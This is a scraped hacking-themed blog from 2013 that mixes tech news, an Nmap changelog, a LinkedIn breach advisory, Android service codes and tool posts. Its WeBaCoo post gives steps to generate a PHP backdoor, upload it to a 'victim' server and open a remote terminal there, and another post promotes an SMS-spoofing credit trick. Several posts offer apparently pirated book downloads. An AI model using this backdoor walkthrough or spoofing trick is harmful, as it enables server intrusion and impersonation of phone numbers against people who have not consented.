Pages

Sunday, December 8, 2013

Used memory sticks being sold online contains sensitive Government data


Selling an used memory sticks often pose an information security risk- We might be thinking that we completely erased the data from it, but it is possible to recover the files that are not properly deleted with the help of some tools.
A recent study found that "old memory sticks" being sold online contain sensitive Australian Government data.

The research paper which is to be presented at a cyber security conference in Perth reveals how researchers discovered the confidential Government data while they are researching the used memory sticks, The Australian news reports.

The study found that sellers are sending memory cards without properly erasing the data. The recovered data not only contains a personal info but also appears to be information belong to Australian government.

"It is evident that actions must be taken by second hand auction sites, and the media to raise awareness and educate end-users on how to dispose of data in an appropriate manner," the study says.

PRIVATE CLOUD COMPUTING: CONSOLIDATION, VIRTUALIZATION, AND SERVICE-ORIENTED INFRASTRUCTURE

Private cloud computing enables you to consolidate diverse enterprise systems into one that is cloud-based and can be accessed by end-users seamlessly, regardless of their location or changes in overall demand. Expert authors Steve Smoot and Nam K. Tan distill their years of networking experience to describe how to build enterprise networks to create a private cloud. With their techniques you'll create cost-saving designs and increase the flexibility of your enterprise, while maintaining the security and control of an internal network. Private Cloud Computing offers a complete cloud architecture for enterprise networking by synthesizing WAN optimization, next-generation data centers, and virtualization in a network-friendly way, tying them together into a complete solution that can be progressively migrated to as time and resources permit.


Describes next-generation data center architectures such as the virtual access-layer, the unified data center fabric and the "rack-and-roll" deployment model
Provides an overview of cloud security and cloud management from the server virtualization perspective
Presents real-world case studies, configuration and examples that allow you to easily apply practical know-how to your existing enterprise environment
Offers effective private cloud computing solutions to simplify the costly and problematic challenge of enterprise networking and branch server consolidation.

DOWNLOAD LINK:      LINK 1

Android Phone's Secret Codes to Check Details !

Hey friends see here some of the tricks on your Android Operating System/ android OS cellphone.
Please note: Some codes mentioned here can be dangerous.




*#*#4636#*#* - Phone / Battery / USage information
*#*#7780#*#* - factory data reset
*2767*3855# - factory format
*#*#34971539#*#* - information about phone camera
*#*#7594#*#* - End Call / Power
*#*#273283*255*663282*#*#* - File copy / backup
*#*#197328640#*#* - Service mode.

WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLAN test (Use "Menu" button to start various tests)
*#*#232338#*#* - Shows WiFi MAC address
*#*#1472365#*#* - GPS test
*#*#1575#*#* - Another GPS test
*#*#232331#*#* - Bluetooth test
*#*#232337#*# - Shows Bluetooth device address
*#*#8255#*#* - This code can be used to launch GTalk Service Monitor.

GET FIRMWARE VERSION INFORMATION:

*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate
*#*#1234#*#* - PDA and Phone
*#*#1111#*#* - FTA SW Version
*#*#2222#*#* - FTA HW Version
*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

CODES TO LAUNCH VARIOUS FACTORY TESTS:

*#*#0283#*#* - Packet Loopback
*#*#0*#*#* - LCD test
*#*#0673#*#* OR *#*#0289#*#* - Melody test
*#*#0842#*#* - Device test (Vibration test and BackLight test)
*#*#2663#*#* - Touch screen version
*#*#2664#*#* - Touch screen test
*#*#0588#*#* - Proximity sensor test
*#*#3264#*#* - RAM version
Have fun with these secrets codes .....:)
Stay tune for next tutorial on Android OS rooting and Binding android and Ubuntu (Linux) Together

INSIDE CYBER WARFARE: MAPPING THE CYBER UNDERWORLD

The necessary handbook for the 21st century.

--Lewis Shepherd, Chief Tech Officer and Senior Fellow, Microsoft Institute for Advanced Technology in Governments

"A must-read for policy makers and leaders who need to understand the big-picture landscape of cyber war."

--Jim Stogdill, CTO, Mission Services Accenture

You may have heard about "cyber warfare" in the news, but do you really know what it is? This book provides fascinating and disturbing details on how nations, groups, and individuals throughout the world are using the Internet as an attack platform to gain military, political, and economic advantages over their adversaries. You'll learn how sophisticated hackers working on behalf of states or organized crime patiently play a high-stakes game that could target anyone, regardless of affiliation or nationality.

Inside Cyber Warfare goes beyond the headlines of attention-grabbing DDoS attacks and takes a deep look inside multiple cyber-conflicts that occurred from 2002 through summer 2009.

Learn how cyber attacks are waged in open conflicts, including recent hostilities between Russia and Georgia, and Israel and Palestine
Discover why Twitter, Facebook, LiveJournal, Vkontakte, and other sites on the social web are mined by the intelligence services of many nations
Read about China's commitment to penetrate the networks of its technologically superior adversaries as a matter of national survival
Find out why many attacks originate from servers in the United States, and who's responsible
Learn how hackers are "weaponizing" malware to attack vulnerabilities at the application level

DOWNLOAD LINK:    LINK 1

Get Free Credits for SMS Global (SMS SPOOFING) !



I will tell you a Trick How to increase Crack credits Of Sms Global,Worlds Best Sms spoofing Website

SO just follow these intructions & you will GEt 125 Free Credits.


1) For this go to a website which help you click here
Register yourself on SMSglobal but before register, The Trick lies Here: go to link for Sign Up

SMSglobal allow only 25 instant credits for free user means you only send 25 SMS but i will tell you a trick by which you will gain 125 credits means 125 free SMS for send globally. When you fill the registration foam,you see a blank space for PROMO CODE here you write the "WPRESS " like given below...



You only fill the:-

1: Username
2: Account type---> Personal
3: Complete Contact Information:: Please write right Mobile Number because Website send you password of the account.Do not add personal address.
4: Write Promo Code "WPRESS".Accept terms and condition and fill Verification Code.
You will get 125 free SMS for send Globally by any Number.

Thursday, December 5, 2013

How to Install Skype on Ubuntu Linux !

Many People feel unsecured while chatting on Skype in windows platform due to the FUD (Fully Undetectable Viruses) threat. Hence today in this tutorial i will tell you how you can run Skype in Linux Platform which is almost 98% secure from RAT and other malicious viruses.

Here we Have two methods of installing Skype in Ubuntu Linux

1. Through Ubuntu Software Center
2. Manual Method

Skype Through Ubuntu Software Center
For this just go to Ubuntu Software Center and in search type Skype , Ubuntu 11.10 Support Skype 2.0 Version for Linux. Click on install and in few minutes you are ready to use the Skype.

Installing Skype Through Manual MethodThis is the easiest method to install from the command line. There are three commands that you must use to install Skype correctly.

Open your terminal and copy paste this commands 

sudo apt-get install libqt4-gui
wget -c -O /tmp/skype.deb http://www.skype.com/go/getskype-linux-ubuntu

sudo dpkg -i /tmp/skype.deb



Now you can see the Skype on your menu bar and you are ready to use Skype no need to worry about RAT and other trojan.

Google to Businesses: Don't Use Google+ (Yet) !

Twitter isn't just about tweeting what you had for lunch, and there's more to Facebook than 'poking' your friends and growing your farm. If you're a business owner, social networking is a great tool for promoting your brand, and at some point, Google+ will join the fray. For the time being, however, Google is asking businesses, universities, and other organizations not to bother with its social networking service.
"Right now we're very much focused on optimizing for the consumer experience, but we have a great team of engineers building a similarly optimized business experience for Google+," Christian Oestlien, product manager for Google+, said in a YouTube video. "We are very excited about it and we hope to roll it out later this year."
Oestlien said the business version will include things like rich analytics and the ability to connect a business profile to other parts of Google, such as AdWords.
"We will be doing some testing," Oestlien said. "We're going to take a small group of brands, businesses, and other entities and create profiles for them and see how users interact with them via circles, through the stream, and even how they communicate through hangouts."
In the meantime, Oestlien asked businesses to refrain from creating consumer accounts, warning that Google+'s policy team will actively work with profile owners to shut down non-user profiles.

How to Improve Your System's Overall Speed | Amit Khajuria





I knw you all are very good in computers but why i am writing this post is because, what i found is when every i got any pc of a B.Tech student(BookWorm Especially) or a Business Man. The worst thing i found is that their systems are full of unwanted software and adding charm on that they have not formatted computer from last 3 or 4 years. That means from the day of purchasing a new laptop they are using the same windows from last 3 years.


And at last they will say in Hindi ( Yaar dekhna iski speed badi slow ho gyi hai, In my heart i reply :- Abey speed to kam hogi hi bachee ki jaan lega 3 saal se to). Anyways so if you are from one of these which i think no one will be accepting ha ha then please read the below tips and make your PC run like a Firebullet :).

1.Let your PC boot up completely before opening any applications.

2.Refresh the desktop after closing any application. This will remove any unused files from the RAM.

3.Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM.

4.Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM

5.Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.

6.Delete the temporary internet files regularly.


7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.


8.Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.


9.When installing new Software disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.


10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.


Google Plus invite or Facebook video calling: What do you prefer !

What would you prefer, Google Plus invite or Facebook video calling? If you ask this question to anyone, the unequal response is known to us all. It will be Google+

It has not been launched yet. Nonetheless it is being talked about in very positive words and everyone seems to be smitten by it. So are we closer to yet another great product from Google, the search and advertising czar.

Google started off as a search engine. Initially it tried to find ways to satisfy its investors about its viability and its ability to generate fund and make profit. But when it discovered the moneymaking ability through its small adds on every other page on the internet, everything else fell in line.

Now it is the biggest advertisement agency along with being the largest search engine with close to sixty five percent of the search engine market across the world.

For the last two years there has been increased talk of Facebook overtaking Google not just in its reach but business as well. Facebook at one point of time was increasing its membership at menacing speed.

But now things are changing. Even before Google Plus became a talking point, there were reports that Facebook membership in its key markets in Europe and USA was declining. In the last few months alone Facebook lost close to 16 million users in the US market. And mind you, US market is financially most important market in websphere followed by Europe.

Now with Google Plus, facebook is now facing an existential threat from the internet giant that has killed many big time players in websphere. Yahoo, Hotmail, MSN just to name a few were among the top players. But they don’t remain at the same level any more.

So is it the turn of Facebook to face the onslaught from Google with Google Plus? During the more than a week it seems that everyone has been smitten by Google plus and its affiliates including Hangouts, circles besides other Google Plus adages.

Nmap 5.59 BETA1 - 40 new NSE scripts & improved IPv6 !

Nmap 5.59 BETA1 - 40 
New NSE scripts & improved IPv6

Official Change Log:

o [NSE] Added 40 scripts, bringing the total to 217! You can learn
more about any of them at http://nmap.org/nsedoc/. Here are the new
ones (authors listed in brackets):

+ afp-ls: Lists files and their attributes from Apple Filing
Protocol (AFP) volumes. [Patrik Karlsson]

+ backorifice-brute: Performs brute force password auditing against
the BackOrifice remote administration (trojan) service. [Gorjan
Petrovski]

+ backorifice-info: Connects to a BackOrifice service and gathers
information about the host and the BackOrifice service
itself. [Gorjan Petrovski]

+ broadcast-avahi-dos: Attempts to discover hosts in the local
network using the DNS Service Discovery protocol, then tests
whether each host is vulnerable to the Avahi NULL UDP packet
denial of service bug (CVE-2011-1002). [Djalal Harouni]

+ broadcast-netbios-master-browser: Attempts to discover master
browsers and the Windows domains they manage. [Patrik Karlsson]

+ broadcast-novell-locate: Attempts to use the Service Location
Protocol to discover Novell NetWare Core Protocol (NCP)
servers. [Patrik Karlsson]

+ creds-summary: Lists all discovered credentials (e.g. from brute
force and default password checking scripts) at end of scan.
[Patrik Karlsson]

+ dns-brute: Attempts to enumerate DNS hostnames by brute force
guessing of common subdomains. [Cirrus]

+ dns-nsec-enum: Attempts to discover target hosts' services using
the DNS Service Discovery protocol. [Patrik Karlsson]

+ dpap-brute: Performs brute force password auditing against an
iPhoto Library. [Patrik Karlsson]

+ epmd-info: Connects to Erlang Port Mapper Daemon (epmd) and
retrieves a list of nodes with their respective port
numbers. [Toni Ruottu]







+ http-affiliate-id: Grabs affiliate network IDs (e.g. Google
AdSense or Analytics, Amazon Associates, etc.) from a web
page. These can be used to identify pages with the same
owner. [Hani Benhabiles, Daniel Miller]

+ http-barracuda-dir-traversal: Attempts to retrieve the
configuration settings from a Barracuda Networks Spam & Virus
Firewall device using the directory traversal vulnerability
described at
http://seclists.org/fulldisclosure/2010/Oct/119. [Brendan Coles]

+ http-cakephp-version: Obtains the CakePHP version of a web
application built with the CakePHP framework by fingerprinting
default files shipped with the CakePHP framework. [Paulino
Calderon]

+ http-majordomo2-dir-traversal: Exploits a directory traversal
vulnerability existing in the Majordomo2 mailing list manager to
retrieve remote files. (CVE-2011-0049). [Paulino Calderon]

+ http-wp-plugins: Tries to obtain a list of installed WordPress
plugins by brute force testing for known plugins. [Ange Gutek]

+ ip-geolocation-geobytes: Tries to identify the physical location
of an IP address using the Geobytes geolocation web service
(http://www.geobytes.com/iplocator.htm). [Gorjan Petrovski]

+ ip-geolocation-geoplugin: Tries to identify the physical location
of an IP address using the Geoplugin geolocation web service
(http://www.geoplugin.com/). [Gorjan Petrovski]

+ ip-geolocation-ipinfodb: Tries to identify the physical location
of an IP address using the IPInfoDB geolocation web service
(http://ipinfodb.com/ip_location_api.php). [Gorjan Petrovski]

+ ip-geolocation-maxmind: Tries to identify the physical location of
an IP address using a Geolocation Maxmind database file (available
from http://www.maxmind.com/app/ip-location). [Gorjan Petrovski]

+ ldap-novell-getpass: Attempts to retrieve the Novell Universal
Password for a user. You must already have (and include in script
arguments) the username and password for an eDirectory server
administrative account. [Patrik Karlsson]

+ mac-geolocation: Looks up geolocation information for BSSID (MAC)
addresses of WiFi access points in the Google geolocation
database. [Gorjan Petrovski]

+ mysql-audit: Audit MySQL database server security configuration
against parts of the CIS MySQL v1.0.2 benchmark (the engine can
also be used for other MySQL audits by creating appropriate audit
files). [Patrik Karlsson]

+ ncp-enum-users: Retrieves a list of all eDirectory users from the
Novell NetWare Core Protocol (NCP) service. [Patrik Karlsson]

+ ncp-serverinfo: Retrieves eDirectory server information (OS
version, server name, mounts, etc.) from the Novell NetWare Core
Protocol (NCP) service. [Patrik Karlsson]

+ nping-brute: Performs brute force password auditing against an
Nping Echo service. [Toni Ruottu]

+ omp2-brute: Performs brute force password auditing against the
OpenVAS manager using OMPv2. [Henri Doreau]

+ omp2-enum-targets: Attempts to retrieve the list of target systems
and networks from an OpenVAS Manager server. [Henri Doreau]

+ ovs-agent-version: Detects the version of an Oracle OVSAgentServer
by fingerprinting responses to an HTTP GET request and an XML-RPC
method call. [David Fifield]

+ quake3-master-getservers: Queries Quake3-style master servers for
game servers (many games other than Quake 3 use this same
protocol). [Toni Ruottu]

+ servicetags: Attempts to extract system information (OS, hardware,
etc.) from the Sun Service Tags service agent (UDP port
6481). [Matthew Flanagan]

+ sip-brute: Performs brute force password auditing against Session
Initiation Protocol (SIP -

http://en.wikipedia.org/wiki/Session_Initiation_Protocol)

accounts. This protocol is most commonly associated with VoIP
sessions. [Patrik Karlsson]

+ sip-enum-users: Attempts to enumerate valid SIP user accounts.
Currently only the SIP server Asterisk is supported. [Patrik
Karlsson]

+ smb-mbenum: Queries information managed by the Windows Master
Browser. [Patrik Karlsson]

+ smtp-vuln-cve2010-4344: Checks for and/or exploits a heap overflow
within versions of Exim prior to version 4.69 (CVE-2010-4344) and
a privilege escalation vulnerability in Exim 4.72 and prior
(CVE-2010-4345). [Djalal Harouni]

+ smtp-vuln-cve2011-1720: Checks for a memory corruption in the
Postfix SMTP server when it uses Cyrus SASL library authentication
mechanisms (CVE-2011-1720). This vulnerability can allow denial
of service and possibly remote code execution. [Djalal Harouni]

+ snmp-ios-config: Attempts to downloads Cisco router IOS
configuration files using SNMP RW (v1) and display or save
them. [Vikas Singhal, Patrik Karlsson]

+ ssl-known-key: Checks whether the SSL certificate used by a host
has a fingerprint that matches an included database of problematic
keys. [Mak Kolybabi]

+ targets-sniffer: Sniffs the local network for a configurable
amount of time (10 seconds by default) and prints discovered
addresses. If the newtargets script argument is set, discovered
addresses are added to the scan queue. [Nick Nikolaou]

+ xmpp: Connects to an XMPP server (port 5222) and collects server
information such as supported auth mechanisms, compression methods
and whether TLS is supported and mandatory. [Vasiliy Kulikov]

o Nmap has long supported IPv6 for basic (connect) port scans, basic
host discovery, version detection, Nmap Scripting Engine. This
release dramatically expands and improves IPv6 support:
+ IPv6 raw packet scans (including SYN scan, UDP scan, ACK scan,
etc.) are now supported. [David, Weilin]
+ IPv6 raw packet host discovery (IPv6 echo requests, TCP/UDP
discovery packets, etc.) is now supported. [David, Weilin]
+ IPv6 traceroute is now supported [David]
+ IPv6 protocol scan (-sO) is now supported, including creating
realistic headers for many protocols. [David]
+ IPv6 support to the wsdd, dnssd and upnp NSE libraries. [Daniel
Miller, Patrik]
+ The --exclude and --excludefile now support IPV6 addresses with
netmasks. [Colin]

o Scanme.Nmap.Org (the system anyone is allowed to scan for testing
purposes) is now dual-stacked (has an IPv6 address as well as IPv4)
so you can scan it during IPv6 testing. We also added a DNS record
for ScanmeV6.nmap.org which is IPv6-only. See
http://seclists.org/nmap-dev/2011/q2/428. [Fyodor]

o The Nmap.Org website as well as sister sites Insecure.Org,
SecLists.Org, and SecTools.Org all have working IPv6 addresses now
(dual stacked). [Fyodor]

o Nmap now determines the filesystem location it is being run from and
that path is now included early in the search path for data files
(such as nmap-services). This reduces the likelihood of needing to
specify --datadir or getting data files from a different version of
Nmap installed on the system. For full details, see
http://nmap.org/book/data-files-replacing-data-files.html. Thanks
to Solar Designer for implementation advice. [David]

o Created a page on our SecWiki for collecting Nmap script ideas! If
you have a good idea, post it to the incoming section of the page.
Or if you're in a script writing mood but don't know what to write,
come here for inspiration: https://secwiki.org/w/Nmap_Script_Ideas.

o The development pace has greatly increased because Google (again)
sponsored a 7 full-time college and graduate student programmer
interns this summer as part of their Summer of Code program!
Thanks, Google Open Source Department! We're delighted to introduce
the team: http://seclists.org/nmap-dev/2011/q2/312

o [NSE] Added 7 new protocol libraries, bringing the total to 66. You
can read about them all at http://nmap.org/nsedoc/. Here are the new
ones (authors listed in brackets):

+ creds: Handles storage and retrieval of discovered credentials
(such as passwords discovered by brute force scripts). [Patrik
Karlsson]

+ ncp: A tiny implementation of Novell Netware Core Protocol
(NCP). [Patrik Karlsson]

+ omp2: OpenVAS Management Protocol (OMP) version 2 support. [Henri
Doreau]

+ sip: Supports a limited subset of SIP commands and
methods. [Patrik Karlsson]

+ smtp: Simple Mail Transfer Protocol (SMTP) operations. [Djalal
Harouni]

+ srvloc: A relatively small implementation of the Service Location
Protocol. [Patrik Karlsson]

+ tftp: Implements a minimal TFTP server. It is used in
snmp-ios-config to obtain router config files.[Patrik Karlsson]

o Improved Nmap's service/version detection database by adding:
+ Apple iPhoto (DPAP) protocol probe [Patrik]
+ Zend Java Bridge probe [Michael Schierl]
+ BackOrifice probe [Gorjan Petrovski]
+ GKrellM probe [Toni Ruotto]
+ Signature improvements for a wide variety of services (we now have
7,375 signatures)

o [NSE] ssh-hostkey now additionally has a postrule that prints hosts
found during the scan which share the same hostkey. [Henri Doreau]

o [NSE] Added 300+ new signatures to http-enum which look for admin
directories, JBoss, Tomcat, TikiWiki, Majordomo2, MS SQL, WordPress,
and more. [Paulino]

o Made the final IP address space assignment update as all available
IPv4 address blocks have now been allocated to the regional
registries. Our random IP generation (-iR) logic now only excludes
the various reserved blocks. Thanks to Kris for years of regular
updates to this function!

o [NSE] Replaced http-trace with a new more effective version. [Paulino]

o Performed some output cleanup work to remove unimportant status
lines so that it is easier to find the good stuff! [David]

o [Zenmap] now properly kills Nmap scan subprocess when you cancel a
scan or quit Zenmap on Windows. [Shinnok]

o [NSE] Banned scripts from being in both the "default" and
"intrusive" categories. We did this by removing dhcp-discover and
dns-zone-transfer from the set of scripts run by default (leaving
them "intrusive"), and reclassifying dns-recursion, ftp-bounce,
http-open-proxy, and socks-open-proxy as "safe" rather than
"intrusive" (keeping them in the "default" set).

o [NSE] Added a credential storage library (creds.lua) and modified
the brute library and scripts to make use of it. [Patrik]

o [Ncat] Created a portable version of ncat.exe that you can just drop
onto Microsoft Windows systems without having to run any installer
or copy over extra library files. See the Ncat page
(http://nmap.org/ncat/) for binary downloads and a link to build
instructions. [Shinnok]

o Fix a segmentation fault which could occur when running Nmap on
various Android-based phones. The problem related to NULL being
passed to freeaddrinfo(). [David, Vlatko Kosturjak]

o [NSE] The host.bin_ip and host.bin_ip_src entries now also work with
16-byte IPv6 addresses. [David]

o [Ncat] Updated the ca-bundle.crt list of trusted certificate
authority certificates. [David]

o [NSE] Fixed a bug in the SMB Authentication library which could
prevent concurrently running scripts with valid credentials from
logging in. [Chris Woodbury]

o [NSE] Re-worked http-form-brute.nse to better autodetect form
fields, allow brute force attempts where only the password (no
username) is needed, follow HTTP redirects, and better detect
incorrect login attempts. [Patrik, Daniel Miller]

o [Zenmap] Changed the "slow comprehensive scan" profile's NSE script
selection from "all" to "default or (discovery and safe)"
categories. Except for testing and debugging, "--script all" is
rarely desirable.

o [NSE] Added the stdnse.silent_require method which is used for
library requires that you know might fail (e.g. "openssl" fails if
Nmap was compiled without that library). If these libraries are
called with silent_require and fail to load, the script will cease
running but the user won't be presented with ugly failure messages
as would happen with a normal require. [Patrick Donnelly]

o [Ncat] ncat now listens on both localhost and ::1 when you run ncat
-l. It works as before if you specify -4 or -6 or a specific
address. [Colin Rice]

o [Zenmap] Fixed a bug in topology mapper which caused endpoints
behind firewalls to sometimes show up in the wrong place (see
http://seclists.org/nmap-dev/2011/q2/733). [Colin Rice]

o [Zenmap] If you scan a system twice, any open ports from the first
scan which are closed in the 2nd will be properly marked as
closed. [Colin Rice].

o [Zenmap] Fixed an error that could cause a crash ("TypeError: an
integer is required") if a sort column in the ports table was unset.
[David]

o [Ndiff] Added nmaprun element information (Nmap version, scan date,
etc.) to the diff. Also, the Nmap banner with version number and
data is now only printed if there were other differences in the
scan. [Daniel Miller, David, Dr. Jesus]

o [NSE] Added nmap.get_interface and nmap.get_interface_info functions
so scripts can access characteristics of the scanning interface.
Removed nmap.get_interface_link. [Djalal]

o Fixed an overflow in scan elapsed time display that caused negative
times to be printed after about 25 days. [Daniel Miller]

o Updated nmap-rpc from the master list, now maintained by IANA.
[Daniel Miller, David]

o [Zenmap] Fixed a bug in the option parser: -sN (null scan) was
interpreted as -sn (no port scan). This was reported by
Shitaneddine. [David]

o [Ndiff] Fixed the Mac OS X packages to use the correct path for
Python: /usr/bin/python instead of /opt/local/bin/python. The bug
was reported by Wellington Castello. [David]

o Removed the -sR (RPC scan) option--it is now an alias for -sV
(version scan), which always does RPC scan when an rpcinfo service
is detected.

o [NSE] Improved the ms-sql scripts and library in several ways:
- Improved version detection and server discovery
- Added support for named pipes, integrated authentication, and
connecting to instances by name or port
- Improved script and library stability and documentation.
[Patrik Karlsson, Chris Woodbury]

o [NSE] Fixed http.validate_options when handling a cookie table.
[Sebastian Prengel]

o Added a Service Tags UDP probe for port 6481/udp. [David]

o [NSE] Enabled firewalk.nse to automatically find the gateways at
which probes are dropped and fixed various bugs. [Henri Doreau]

o [Zenmap] Worked around a pycairo bug that prevented saving the
topology graphic as PNG on Windows: "Error Saving Snapshot:
Surface.write_to_png takes one argument which must be a filename
(str), file object, or a file-like object which has a 'write' method
(like StringIO)". The problem was reported by Alex Kah. [David]

o The -V and --version options now show the platform Nmap was compiled
on, which features are compiled in, the version numbers of libraries
it is linked against, and whether the libraries are the ones that
come with Nmap or the operating system. [Ambarisha B., David]

o Fixed some inconsistencies in nmap-os-db reported by Xavier Sudre
from netVigilance.

o The Nmap Win32 uninstaller now properly deletes nping.exe. [Fyodor]

o [NSE] Added a shortport.ssl function which can be used as a script
portrule to match SSL services. It is similar in concept to our
existing shortport.http. [David]

o Set up the RPM build to use the compat-glibc and compat-gcc-34-c++
packages (on CentOS 5.3) to resolve a report of Nmap failing to run
on old versions of Glibc. [David]

o We no longer support Nmap on versions of Windows earlier than XP
SP2. Even Microsoft no longer supports Windows versions that old.
But if you must use Nmap on such systems anyway, please see

https://secwiki.org/w/Nmap_On_Old_Windows_Releases.

o There were hundreds of other little bug fixes and improvements
(especially to NSE scripts). See the SVN logs for revisions 22,274
through 24,460 for details.

Download Here

Linked In Confirms Data Breach, Here's What You Can Do !

Phishers are coming out of the woodwork trying to bait panicked or otherwise unsuspecting LinkedIn users into supposedly 'confirming' their account, but what they're really doing is hijacking login credentials. They're also compounding the situation, whereby LinkedIn has now confirmed it suffered a data breach in which encrypted user passwords were compromised. Here's what you should do.
First and foremost, log into LinkedIn by typing the site's address directly into your browser and change your password. Don't click on any links in emails, even if they appear to be legit, which some of them do. It's unclear whether or not LinkedIn has begun notifying its members of the data breach via email, but according to security firm ESET, plenty of legitimate looking phishing emails are making the rounds.

The next thing you should do is change your password on any other site that uses the same login credentials. You should be using different passwords for different sites anyway, but if not, now's a great time to get into the habit of separating your online accounts.
According to reports, around 6.5 million LinkedIn passwords fell into malicious hands, so there's a good chance yours is one of them. If you want to know for sure, LastPass has an online tool that will compare the SHA-1 hash of your password with those that have been compromised. But is it safe to fork over your LinkedIn password to LastPass?


"The above tool asks you to enter your LinkedIn password, and then computes its SHA-1 hash and sends the result to LastPass.com to search the list of 6.5 million leaked password hashes. A hash is a mathematical function that is simple to perform in one direction, but very difficult to reverse. Meaning, the tool will convert your password into a series of characters in such a way that it will be very difficult to re-construct your original password," LastPass explains.
LastPass says that only the hash of your password is sent to LastPass.com's servers, not your actual password. And according to Mashable, LastPass doesn't store your hash on its servers. Still, if you're feeling uneasy, go ahead and change your LinkedIn password regardless.

World IPv6 Launch Gives Crowded Internet Much Needed Breathing Room !

If you're reading this, you must be online, and if you're online, let us say 'Welcome to a larger Internet.' Today kicks off theWorld IPv6 Launch event organized by the Internet Society and intended to bring major internet service providers (ISPs), home networking equipment manufacturers, and web companies around the world together to enable and embrace the IPv6 protocol for their products and services.
Count Google among them. As the sultan of search points out, few could have imagined that the Internet today would serve nearly 2.5 billion people and 11 billion devices when it was launched operationally back in 1983. But that's what happened, and suddenly the Internet is running out of addresses.
As constructed, there's room for around 4.3 billion addresses. Internet Protocol version 6 expands that number exponentially, to "about 340 trillion, trillion, trillion!," Google says.
"Today's World IPv6 Launch, coordinated by the Internet Society, marks the day that participating websites, Internet Service Providers (ISP), and network hardware manufacturers switch on IPv6 permanently in parallel with IPv4," Google said in a blog post. "We’re proud to be one of the founding participants; virtually all Google’s services have been available over IPv6 for a while, but IPv6 access was only available to networks participating in the 'Google over IPv6' program. From now on, they will be made available to any IPv6 network on the Internet (well, almost any).
IPv6 still has a ways to go in terms of widespread adoption. Most ISPs haven't embraced the new standard yet, and the same is true for many websites. Not all home network equipment supports IPv6 either, though some can be upgraded with a relatively simple firmware updates. Others will need to be replaced entirely.
Are you ready? If you want to test your setup and infrastructure, head here.

Dell Launches Inspiron 14z Ultrabook, 'Fashionable' Inspiron 15R and 17R Laptops !

The very last thing in the world students heading out into summer vacation want to think about right now is the fact they'll have to go back to school in a few months. Parents, however, know the back-to-school season is coming, and they're the ones Dell is pitching its "tailored line-up of Inspiron laptops" to, including Dell's first Inspiron Ultrabook model, the 14z.

Dell's 14z rolls off the lot with a Core i3 processor, though you can upgrade to a Core i5 or Core i7 Ivy Bridge processor before driving it home. It's only Dell's second Ultrabook model, joining the XPS 13, and it sports a brushed aluminum finish in Moon Silver or (later this summer) Fire Red. A baseline build weighs 4.12 pounds and measures 0.83 inches at its chunkiest point. And if that's too big, Dell also announced a 13-inch version (13z) that weighs 3.81 pounds. Pricing starts at $700 for the 14z and $600 for the 13z.

In addition to Ultrabooks, Dell today rolled out new Inspiron 15R and 17R laptops with high definition displays and a variety of processor, memory, and storage options. They also feature optional color SWITCH lids, Intel Wireless Display technology, and Waves MaxxAudio 3 sound processing. Special Edition versions up the ante with Full HD displays, Blu-ray options, Skullcandy speakers, and Nvidia graphics options (17R). Pricing starts at $550 for the 15R ($900 for the Special Edition) and $600 for the 17R ($1,300 for Special Edition).
Image Credit: Dell

Wednesday, December 4, 2013

JOOMSCAN (JOOMLA SECURITY SCANNER)

                                                           Joomscan
                                 (Joomla Security Scanner)



Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS. The Updated version can detects 673 vulnerabilities . Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site.

VIDEO TUTORIAL:
http://adf.ly/VVqO6

DOWNLOAD LINK:       LINK 1

WEBACOO - WEB BACKDOOR COOKIE SCRIPT-KIT

                                          WeBaCoo
                        (Web Backdoor Cookie Script-Kit)

Usage: webacoo.pl [options]


Options:
-g Generate backdoor code (-o is required)

-f FUNCTION PHP System function to use


FUNCTION:
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen

-o OUTPUT Generated backdoor output filename

-r Return un-obfuscated backdoor code

-t Establish remote "terminal" connection (-u is required)

-u URL Backdoor URL

-c C_NAME Cookie name (default: "M-cookie")

-d DELIM Delimiter (default: New random for each request)

-a AGENT HTTP header user-agent (default exist)

-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)

-v LEVEL Verbose level
LEVEL:
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data

-h Display help and exit

update Check for updates and apply if any

1. Generate php backdoor file
- ./webacoo.pl -g -o backdoor.php

2. Upload backdoor to victim

3. Use WeBaCoo connect to backdoor
- ./webacoo.pl -t -u http://victim/backdoor.php

4. Now you are in the victim console, do whatever you want :)

VIDEO TUTORIAL:
http://www.youtube.com/watch?v=6PS3ul7_JRo

DOWNLOAD LINK:     LINK 1

WSORROW TOOL

web-sorrow is a PERL based tool used for checking a Web server for misconfiguration, version detection, enumeration, and server information. It is NOT a vulnerability scanner, inspection proxy, DDoS tool or an exploitation framework.

Current Functionality:

-S – stands for standard. a set of Standard tests and includes: indexing of directories testing,
banner grabbing, language detection (should be obvious), robots.txt, and 200 response testing (some servers send a 200 ok for every req)


-Eb – stands for error bagging. The default config for servers is to put the server daemon and version and sometimes even the OS inside of error pages. web-sorrow reqs a URl of 20 random bytes with get and post methods.

-auth – looks for login pages with a list of some of the most common login files and dirs. We don’t need to be very big list of URLs because what else are going to name it?


-cmsPlugins – run a huge list of plugins dirs for cms servers. the list is a bit old (2010)


-I – searches the responses for interesting strings

-Ws – looks for web services such as hosting provider, blogging services, favicon fingerprinting, and cms version info

-Fd – look for generally things people don’t want you to see. The list is generated form a TON of robot.txt so whatever it finds should be interesting
-proxy – send all http reqs via a proxy. example: 255.255.255.254:8080-e – run all the scans in the scannerweb-sorrow also has false positives checking on most of it’s requests (it pretty accurate but not perfect).

VIDEO TUTORIAL:
